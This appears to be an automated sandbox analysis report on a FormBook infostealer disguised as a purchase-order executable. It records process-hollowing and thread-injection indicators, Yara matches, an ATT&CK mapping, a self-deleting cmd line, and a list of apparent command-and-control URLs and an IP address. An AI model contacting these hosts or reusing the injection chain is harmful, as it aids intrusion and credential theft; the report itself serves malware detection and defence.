          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B892A mov eax, dword ptr fs:[00000030h]2_2_038B892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C892B mov eax, dword ptr fs:[00000030h]2_2_038C892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0946 mov eax, dword ptr fs:[00000030h]2_2_038B0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03856962 mov eax, dword ptr fs:[00000030h]2_2_03856962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov edx, dword ptr fs:[00000030h]2_2_0387096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E mov eax, dword ptr fs:[00000030h]2_2_0387096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4978 mov eax, dword ptr fs:[00000030h]2_2_038D4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC97C mov eax, dword ptr fs:[00000030h]2_2_038BC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03830887 mov eax, dword ptr fs:[00000030h]2_2_03830887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC89D mov eax, dword ptr fs:[00000030h]2_2_038BC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385E8C0 mov eax, dword ptr fs:[00000030h]2_2_0385E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA8E4 mov eax, dword ptr fs:[00000030h]2_2_038FA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386C8F9 mov eax, dword ptr fs:[00000030h]2_2_0386C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BC810 mov eax, dword ptr fs:[00000030h]2_2_038BC810
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov ecx, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03852835 mov eax, dword ptr fs:[00000030h]2_2_03852835
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A830 mov eax, dword ptr fs:[00000030h]2_2_0386A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D483A mov eax, dword ptr fs:[00000030h]2_2_038D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D483A mov eax, dword ptr fs:[00000030h]2_2_038D483A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03842840 mov ecx, dword ptr fs:[00000030h]2_2_03842840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860854 mov eax, dword ptr fs:[00000030h]2_2_03860854
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834859 mov eax, dword ptr fs:[00000030h]2_2_03834859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834859 mov eax, dword ptr fs:[00000030h]2_2_03834859
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE872 mov eax, dword ptr fs:[00000030h]2_2_038BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE872 mov eax, dword ptr fs:[00000030h]2_2_038BE872
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6870 mov eax, dword ptr fs:[00000030h]2_2_038C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6870 mov eax, dword ptr fs:[00000030h]2_2_038C6870
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386CF80 mov eax, dword ptr fs:[00000030h]2_2_0386CF80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862F98 mov eax, dword ptr fs:[00000030h]2_2_03862F98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03862F98 mov eax, dword ptr fs:[00000030h]2_2_03862F98
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832FC8 mov eax, dword ptr fs:[00000030h]2_2_03832FC8
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_00CB53F0 SetUnhandledExceptionFilter,5_2_00CB53F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_00CB51A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00CB51A0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 156.235.1.30 80Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 1028Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1028Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: CB0000Jump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C9A008Jump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_00CB4ACA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00CB4ACA
          Source: explorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd=
          Source: explorer.exe, 00000003.00000000.2055892118.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3286845843.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: Purchase order MIPO2425110032.exe, explorer.exe, 00000003.00000000.2057404240.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2055892118.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3286845843.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.2055892118.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3286845843.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.2055892118.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3286845843.0000000001731000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.3285665342.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2055532925.0000000000EF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PProgman
          Source: Purchase order MIPO2425110032.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Purchase order MIPO2425110032.exeBinary or memory string: WIN_XP
          Source: Purchase order MIPO2425110032.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
          Source: Purchase order MIPO2425110032.exeBinary or memory string: WIN_XPe
          Source: Purchase order MIPO2425110032.exeBinary or memory string: WIN_VISTA
          Source: Purchase order MIPO2425110032.exeBinary or memory string: WIN_7
          Source: Purchase order MIPO2425110032.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase order MIPO2425110032.exe.2ef0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.2190626365.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2190931021.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2048344013.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3286282014.0000000003660000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.2190906829.0000000003580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3285667047.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.3286219913.0000000003630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts          		2
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares21
          Input Capture          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS26
          System Information Discovery          		Distributed Component Object Model3
          Clipboard Data          		12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script612
          Process Injection          		1
          Rootkit          		LSA Secrets241
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Valid Accounts          		Cached Domain Credentials12
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
          Virtualization/Sandbox Evasion          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt612
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
          System Network Configuration Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548508 Sample: Purchase order  MIPO2425110... Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 28 www.6282.xyz 2->28 30 www.sfmoreservicesllc.lat 2->30 32 4 other IPs or domains 2->32 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 54 9 other signatures 2->54 10 Purchase order  MIPO2425110032.exe 1 2->10         started        signatures3 52 Performs DNS queries to domains with low reputation 28->52 process4 signatures5 56 Writes to foreign memory regions 10->56 58 Maps a DLL or memory area into another process 10->58 13 svchost.exe 10->13         started        process6 signatures7 60 Uses ipconfig to lookup or modify the Windows network settings 13->60 62 Modifies the context of a thread in another process (thread injection) 13->62 64 Maps a DLL or memory area into another process 13->64 66 4 other signatures 13->66 16 ipconfig.exe 13->16         started        19 explorer.exe 64 1 13->19 injected process8 dnsIp9 36 Modifies the context of a thread in another process (thread injection) 16->36 38 Reads the DNS cache 16->38 40 Maps a DLL or memory area into another process 16->40 44 2 other signatures 16->44 22 cmd.exe 1 16->22         started        34 www.6282.xyz 156.235.1.30, 49943, 80 CNSERVERSUS Seychelles 19->34 42 System process connects to network (likely due to code injection or exploit) 19->42 24 autochk.exe 19->24         started        signatures10 process11 process12 26 conhost.exe 22->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Purchase order MIPO2425110032.exe21%ReversingLabsWin32.Trojan.AutoitInject
          Purchase order MIPO2425110032.exe100%AviraHEUR/AGEN.1321665
          Purchase order MIPO2425110032.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.lasterdeals.shopReferer:0%Avira URL Cloudsafe
          http://www.6282.xyz/ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBq0%Avira URL Cloudsafe
          http://www.g18q11a.topReferer:0%Avira URL Cloudsafe
          http://www.giyztm.xyz/ge07/www.oal-ahzgwo.xyz0%Avira URL Cloudsafe
          http://www.wner-nyquh.xyz/ge07/0%Avira URL Cloudsafe
          http://www.ostcanadantpl.top/ge07/0%Avira URL Cloudsafe
          http://www.zoc-marriage.xyz0%Avira URL Cloudsafe
          http://www.dvle-father.xyz/ge07/www.f7y2i9fgm.xyz0%Avira URL Cloudsafe
          http://www.lasterdeals.shop/ge07/0%Avira URL Cloudsafe
          http://www.ecurityemployment.today/ge07/www.wner-nyquh.xyz0%Avira URL Cloudsafe
          http://www.sfmoreservicesllc.lat/ge07/www.6282.xyz0%Avira URL Cloudsafe
          http://www.rowadservepros.net/ge07/www.dvle-father.xyz0%Avira URL Cloudsafe
          http://www.f7y2i9fgm.xyz/ge07/www.giyztm.xyz0%Avira URL Cloudsafe
          http://www.f7y2i9fgm.xyz0%Avira URL Cloudsafe
          http://www.sfmoreservicesllc.lat0%Avira URL Cloudsafe
          http://www.6282.xyzReferer:0%Avira URL Cloudsafe
          http://www.6282.xyz0%Avira URL Cloudsafe
          http://www.sfmoreservicesllc.lat/ge07/0%Avira URL Cloudsafe
          http://www.dvle-father.xyzReferer:0%Avira URL Cloudsafe
          http://www.rowadservepros.net/ge07/0%Avira URL Cloudsafe
          http://www.dvle-father.xyz0%Avira URL Cloudsafe
          http://www.ostcanadantpl.topReferer:0%Avira URL Cloudsafe
          http://www.wner-nyquh.xyz/ge07/www.lasterdeals.shop0%Avira URL Cloudsafe
          http://www.rowadservepros.net0%Avira URL Cloudsafe
          http://www.f7y2i9fgm.xyzReferer:0%Avira URL Cloudsafe
          http://www.ecurityemployment.todayReferer:0%Avira URL Cloudsafe
          http://www.epehr.pics0%Avira URL Cloudsafe
          http://www.oal-ahzgwo.xyz/ge07/0%Avira URL Cloudsafe
          http://www.ostcanadantpl.top0%Avira URL Cloudsafe
          http://www.ecurityemployment.today/ge07/0%Avira URL Cloudsafe
          http://www.g18q11a.top0%Avira URL Cloudsafe
          http://www.rkgexg.top0%Avira URL Cloudsafe
          http://www.rkgexg.top/ge07/0%Avira URL Cloudsafe
          http://www.wner-nyquh.xyzReferer:0%Avira URL Cloudsafe
          http://www.epehr.pics/ge07/0%Avira URL Cloudsafe
          http://www.lasterdeals.shop/ge07/www.zoc-marriage.xyz0%Avira URL Cloudsafe
          http://www.dvle-father.xyz/ge07/0%Avira URL Cloudsafe
          http://www.g18q11a.top/ge07/0%Avira URL Cloudsafe
          http://www.6282.xyz/ge07/0%Avira URL Cloudsafe
          http://www.lasterdeals.shop0%Avira URL Cloudsafe
          http://www.oal-ahzgwo.xyz/ge07/www.epehr.pics0%Avira URL Cloudsafe
          http://www.rkgexg.top/ge07/www.9net88.net0%Avira URL Cloudsafe
          http://www.oal-ahzgwo.xyzReferer:0%Avira URL Cloudsafe
          http://www.9net88.net/ge07/www.ecurityemployment.today0%Avira URL Cloudsafe
          http://www.rowadservepros.netReferer:0%Avira URL Cloudsafe
          http://www.wner-nyquh.xyz0%Avira URL Cloudsafe
          http://www.sfmoreservicesllc.latReferer:0%Avira URL Cloudsafe
          http://www.6282.xyz/ge07/www.ostcanadantpl.top0%Avira URL Cloudsafe
          http://www.ostcanadantpl.top/ge07/www.rkgexg.top0%Avira URL Cloudsafe
          http://www.g18q11a.top/ge07/www.rowadservepros.net0%Avira URL Cloudsafe
          http://www.zoc-marriage.xyzReferer:0%Avira URL Cloudsafe
          http://www.zoc-marriage.xyz/ge07/www.g18q11a.top0%Avira URL Cloudsafe
          http://www.f7y2i9fgm.xyz/ge07/0%Avira URL Cloudsafe
          http://www.epehr.picsReferer:0%Avira URL Cloudsafe
          http://www.oal-ahzgwo.xyz0%Avira URL Cloudsafe
          http://www.rkgexg.topReferer:0%Avira URL Cloudsafe
          http://www.ecurityemployment.today0%Avira URL Cloudsafe
